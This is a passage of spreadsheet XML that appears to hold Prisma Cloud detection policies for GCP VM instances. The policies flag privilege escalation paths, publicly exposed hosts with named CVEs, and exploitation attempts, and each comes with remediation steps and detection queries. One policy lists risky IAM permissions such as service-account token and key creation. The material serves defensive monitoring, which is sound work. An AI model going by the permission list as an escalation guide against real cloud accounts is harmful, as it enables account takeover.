      <c r="AC2792" t="inlineStr"/>
      <c r="AD2792" t="b">
        <v>1</v>
      </c>
      <c r="AE2792" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2792" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>ea4283bc-7a00-49f4-a734-e17a35760bba</t>
        </is>
      </c>
      <c r="AI2792" t="inlineStr">
        <is>
          <t>9ebb57cf-81ff-4482-98a9-a5ec2e8956a2</t>
        </is>
      </c>
      <c r="AJ2792" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2792" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2793">
      <c r="A2793" t="inlineStr"/>
      <c r="B2793" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2793" s="2" t="inlineStr"/>
      <c r="D2793" t="inlineStr"/>
      <c r="E2793" t="inlineStr"/>
      <c r="F2793" t="inlineStr"/>
      <c r="G2793" t="b">
        <v>1</v>
      </c>
      <c r="H27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93" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2793" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2793" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with Cloud Function IAM policy Edit permissions</t>
        </is>
      </c>
      <c r="L2793" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2793" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2793" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2793" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2793" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2793" t="inlineStr"/>
      <c r="R2793" t="inlineStr"/>
      <c r="S2793" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2793" t="b">
        <v>0</v>
      </c>
      <c r="U2793" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2793" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2793" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have Cloud Function IAM policy Edit permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky Cloud Function IAM policy Edit permissions further helps attackers escalate their privileges and perform unauthorised actions in the cloud account.
This policy checks for the following Cloud function permissions:
'cloudfunctions.functions.setIamPolicy', 'iam.serviceAccounts.actAs'.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2793"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793" t="inlineStr"/>
      <c r="Z2793" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned Cloud Function IAM Policy Edit Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2793" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2793" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:44</t>
        </is>
      </c>
      <c r="AC2793" t="inlineStr"/>
      <c r="AD2793" t="b">
        <v>1</v>
      </c>
      <c r="AE2793" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2793" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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93" t="inlineStr">
        <is>
          <t>e3673fcc-ad3f-499b-8700-028a6aaa5ee4</t>
        </is>
      </c>
      <c r="AI2793" t="inlineStr">
        <is>
          <t>c18e2e80-9e7e-4e7d-a56b-2e20287744f5</t>
        </is>
      </c>
      <c r="AJ2793" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2793" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2794">
      <c r="A2794" t="inlineStr"/>
      <c r="B2794" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2794" s="2" t="inlineStr"/>
      <c r="D2794" t="inlineStr"/>
      <c r="E2794" t="inlineStr"/>
      <c r="F2794" t="inlineStr"/>
      <c r="G2794" t="b">
        <v>1</v>
      </c>
      <c r="H27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94" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2794" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2794" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to unencrypted sensitive data transmission detected on GCP VM instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2794" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2794" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2794" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2794" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2794" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2794" t="inlineStr"/>
      <c r="R2794" t="inlineStr"/>
      <c r="S2794" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2794" t="b">
        <v>0</v>
      </c>
      <c r="U2794" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2794" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2794" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance with unencrypted sensitive data transmission detected and having permissions that could potentially lead to privilege escalation.
Unencrypted sensitive data transmission via API endpoint exposed to internet includes potential unauthorized access and exploitation. When combined with elevated virtual machine permissions and sensitive data/credentials transmission, attackers can escalate privileges, gain control over resources, and execute malicious actions within the environment.
This policy checks for the following risky permissions:
'accessapproval.requests.approve','accessapproval.requests.dismiss','accessapproval.settings.delete','accessapproval.settings.update','accesscontextmanager.accessLevels.create','accesscontextmanager.accessLevels.delete','accesscontextmanager.accessLevels.replaceAll','accesscontextmanager.accessLevels.update','accesscontextmanager.accessPolicies.create','accesscontextmanager.accessPolicies.delete','accesscontextmanager.accessPolicies.setIamPolicy','accesscontextmanager.accessPolicies.update','accesscontextmanager.gcpUserAccessBindings.create','accesscontextmanager.gcpUserAccessBindings.delete','accesscontextmanager.gcpUserAccessBindings.update','accesscontextmanager.policies.create','accesscontextmanager.policies.delete','accesscontextmanager.policies.setIamPolicy','accesscontextmanager.policies.update','iam.roles.create','iam.roles.delete','iam.roles.undelete', 'iam.roles.update','iam.serviceAccounts.getAccessToken','iam.serviceAccountKeys.create','iam.serviceAccountKeys.delete','iam.serviceAccounts.create','iam.serviceAccounts.delete','iam.serviceAccounts.disable','iam.serviceAccounts.enable','iam.serviceAccounts.setIamPolicy','iam.serviceAccounts.undelete','iam.serviceAccounts.update','iam.serviceAccounts.implicitDelegation','iam.serviceAccounts.signBlob','iam.serviceAccounts.signJwt','iam.serviceAccounts.actAs','compute.backendServices.setIamPolicy','compute.disks.removeResourcePolicies','compute.disks.setIamPolicy','compute.firewallPolicies.setIamPolicy','compute.globalOperations.setIamPolicy','compute.images.setIamPolicy','compute.instanceTemplates.setIamPolicy','compute.instances.removeResourcePolicies','compute.instances.setIamPolicy','compute.instances.setServiceAccount','compute.machineImages.setIamPolicy','compute.maintenancePolicies.setIamPolicy','compute.snapshots.setIamPolicy'
Immediate attention is required to review the API endpoint traffic on the server, add the WAAS rule to prevent this activity, review and remove unwanted permissions assigned to the VM instance.</t>
        </is>
      </c>
      <c r="X279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t>
        </is>
      </c>
      <c r="Y2794" t="inlineStr"/>
      <c r="Z2794" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'gcloud-compute-instances-list' ) and finding.name contains all ('Sensitive data sent via API endpoint exposed to internet without encryption','GCP Compute Engine with IAM write access level')</t>
        </is>
      </c>
      <c r="AA2794" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2794" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:58</t>
        </is>
      </c>
      <c r="AC2794" t="inlineStr"/>
      <c r="AD2794" t="b">
        <v>1</v>
      </c>
      <c r="AE2794" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2794" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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94" t="inlineStr">
        <is>
          <t>dba2ea0f-d60b-4eb5-8070-c3c19e2330d4</t>
        </is>
      </c>
      <c r="AI2794" t="inlineStr">
        <is>
          <t>6a8791cd-083e-427a-8185-903dad0ded20</t>
        </is>
      </c>
      <c r="AJ2794" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2794" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2795">
      <c r="A2795" t="inlineStr"/>
      <c r="B2795" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2795" s="2" t="inlineStr"/>
      <c r="D2795" t="n">
        <v>57</v>
      </c>
      <c r="E2795" t="n">
        <v>1</v>
      </c>
      <c r="F2795" t="n">
        <v>0</v>
      </c>
      <c r="G2795" t="b">
        <v>1</v>
      </c>
      <c r="H27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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2795" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2795" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (OpenSSH, CVE-2023-38408)</t>
        </is>
      </c>
      <c r="L2795" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2795" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2795" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2795" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2795" t="inlineStr"/>
      <c r="R2795" t="inlineStr"/>
      <c r="S2795" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2795" t="b">
        <v>0</v>
      </c>
      <c r="U2795" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2795" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2795" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-38408).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OpenSSH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OpenSSH (CVE-2023-38408) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X279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CVE-2023-38408
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-38408</t>
        </is>
      </c>
      <c r="Y2795" t="inlineStr"/>
      <c r="Z2795" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-38408'))</t>
        </is>
      </c>
      <c r="AA2795" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2795" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:11</t>
        </is>
      </c>
      <c r="AC2795" t="inlineStr"/>
      <c r="AD2795" t="b">
        <v>1</v>
      </c>
      <c r="AE2795" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2795" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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5" t="inlineStr">
        <is>
          <t>79fc175b-b917-45b0-9bf4-ed52d40a2782</t>
        </is>
      </c>
      <c r="AI2795" t="inlineStr">
        <is>
          <t>e80e7fcb-218a-464d-937b-48b122472b61</t>
        </is>
      </c>
      <c r="AJ2795" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2795" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2796">
      <c r="A2796" t="inlineStr"/>
      <c r="B2796" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2796" s="2" t="inlineStr"/>
      <c r="D2796" t="n">
        <v>9</v>
      </c>
      <c r="E2796" t="n">
        <v>0</v>
      </c>
      <c r="F2796" t="n">
        <v>0</v>
      </c>
      <c r="G2796" t="b">
        <v>1</v>
      </c>
      <c r="H27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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2796" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2796" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable GCP VM instance [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L2796" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2796" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2796" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2796" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2796" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2796" t="inlineStr"/>
      <c r="R2796" t="inlineStr"/>
      <c r="S2796" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2796" t="b">
        <v>0</v>
      </c>
      <c r="U2796" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2796" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2796" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable denial of service vulnerability [Python, CVE-2021-20270].
Denial of service vulnerability is a security flaw allowing a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X279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CVE-2021-20270
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-20270</t>
        </is>
      </c>
      <c r="Y2796" t="inlineStr"/>
      <c r="Z2796" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2796" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2796" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:50</t>
        </is>
      </c>
      <c r="AC2796" t="inlineStr"/>
      <c r="AD2796" t="b">
        <v>1</v>
      </c>
      <c r="AE2796" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2796" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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6" t="inlineStr">
        <is>
          <t>b5840c1e-0a89-45fb-9060-7719033a34ca</t>
        </is>
      </c>
      <c r="AI2796" t="inlineStr">
        <is>
          <t>a39600ff-f998-4082-9d6e-ca90dd76d250</t>
        </is>
      </c>
      <c r="AJ2796" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2796" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2797">
      <c r="A2797" t="inlineStr"/>
      <c r="B2797" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2797" s="2" t="inlineStr"/>
      <c r="D2797" t="inlineStr"/>
      <c r="E2797" t="inlineStr"/>
      <c r="F2797" t="inlineStr"/>
      <c r="G2797" t="b">
        <v>1</v>
      </c>
      <c r="H27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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2797" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2797" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855]</t>
        </is>
      </c>
      <c r="L2797" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2797" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2797" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2797" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2797" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2797" t="inlineStr"/>
      <c r="R2797" t="inlineStr"/>
      <c r="S2797" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2797" t="b">
        <v>0</v>
      </c>
      <c r="U2797" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2797" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2797" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerability [CVE-2021-26855] reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2797"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CVE-2021-26855
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26855</t>
        </is>
      </c>
      <c r="Y2797" t="inlineStr"/>
      <c r="Z2797" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26855 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26855'))</t>
        </is>
      </c>
      <c r="AA2797" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2797" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:37</t>
        </is>
      </c>
      <c r="AC2797" t="inlineStr"/>
      <c r="AD2797" t="b">
        <v>1</v>
      </c>
      <c r="AE2797" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2797" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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7" t="inlineStr">
        <is>
          <t>2adbe18c-3eb1-4049-a221-e7e6376846db</t>
        </is>
      </c>
      <c r="AI2797" t="inlineStr">
        <is>
          <t>f4999913-c18a-4e7b-be67-12bec870ab0f</t>
        </is>
      </c>
      <c r="AJ2797" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2797" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2798">
      <c r="A2798" t="inlineStr"/>
      <c r="B2798" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2798" s="2" t="inlineStr"/>
      <c r="D2798" t="inlineStr"/>
      <c r="E2798" t="inlineStr"/>
      <c r="F2798" t="inlineStr"/>
      <c r="G2798" t="b">
        <v>1</v>
      </c>
      <c r="H27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798" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2798" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2798" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed GCP VM instance with Probllama vulnerability (Ollama, CVE-2024-37032)</t>
        </is>
      </c>
      <c r="L2798" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2798" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2798" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2798" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2798" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2798" t="inlineStr"/>
      <c r="R2798" t="inlineStr"/>
      <c r="S2798" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2798" t="b">
        <v>0</v>
      </c>
      <c r="U2798" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2798" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2798" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have a known exploitable Remote Code Execution vulnerability named Probllama (CVE-2024-37032).
Ollama is a service for packaging, deploying, and running large language models (LLMs) locally on Windows, Linux, and macOS devices. CVE-2024-37032 exploits a path traversal flaw in Ollama's file upload functionality, enabling an attacker to upload a malicious file, traverse directories, and execute arbitrary code. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Ollama (CVE-2024-37032) vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2798" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirements by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to the Internet
4. Update VPC firewall rule that allows Internet access (0.0.0.0/0) to trusted IP address
   Refer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VPC firewall group rules, ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-37032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-37032</t>
        </is>
      </c>
      <c r="Y2798" t="inlineStr"/>
      <c r="Z2798" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-37032'))</t>
        </is>
      </c>
      <c r="AA2798" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2798" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:44</t>
        </is>
      </c>
      <c r="AC2798" t="inlineStr"/>
      <c r="AD2798" t="b">
        <v>1</v>
      </c>
      <c r="AE2798" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2798" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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798" t="inlineStr">
        <is>
          <t>7a029f0d-6c5c-4102-8309-4cb65c9b73b0</t>
        </is>
      </c>
      <c r="AI2798" t="inlineStr">
        <is>
          <t>33613ffd-bd29-4200-bc06-dd4b5d7b014f</t>
        </is>
      </c>
      <c r="AJ2798" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2798" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2799">
      <c r="A2799" t="inlineStr"/>
      <c r="B2799" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2799" s="2" t="inlineStr"/>
      <c r="D2799" t="inlineStr"/>
      <c r="E2799" t="inlineStr"/>
      <c r="F2799" t="inlineStr"/>
      <c r="G2799" t="b">
        <v>1</v>
      </c>
      <c r="H27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799" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2799" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2799" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance [Linux Kernel, CVE-2022-47939]</t>
        </is>
      </c>
      <c r="L2799" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2799" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2799" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2799" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2799" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2799" t="inlineStr"/>
      <c r="R2799" t="inlineStr"/>
      <c r="S2799" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2799" t="b">
        <v>0</v>
      </c>
      <c r="U2799" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2799" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2799" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-47939].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Linux [CVE-2022-47939] vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X279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CVE-2022-47939
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-47939</t>
        </is>
      </c>
      <c r="Y2799" t="inlineStr"/>
      <c r="Z2799" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-47939'))</t>
        </is>
      </c>
      <c r="AA2799" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2799" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2799" t="inlineStr"/>
      <c r="AD2799" t="b">
        <v>1</v>
      </c>
      <c r="AE2799" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2799" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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799" t="inlineStr">
        <is>
          <t>e9926f87-854a-4ce0-8484-df93a2ee3950</t>
        </is>
      </c>
      <c r="AI2799" t="inlineStr">
        <is>
          <t>fcf4884d-1e49-42ba-9514-efe5be6606cd</t>
        </is>
      </c>
      <c r="AJ2799" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2799" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2800">
      <c r="A2800" t="inlineStr"/>
      <c r="B2800" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2800" s="2" t="inlineStr"/>
      <c r="D2800" t="n">
        <v>763</v>
      </c>
      <c r="E2800" t="n">
        <v>0</v>
      </c>
      <c r="F2800" t="n">
        <v>38</v>
      </c>
      <c r="G2800" t="b">
        <v>1</v>
      </c>
      <c r="H28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800" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2800" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2800" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with Cloud Function Creation permissions</t>
        </is>
      </c>
      <c r="L2800" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2800" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2800" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
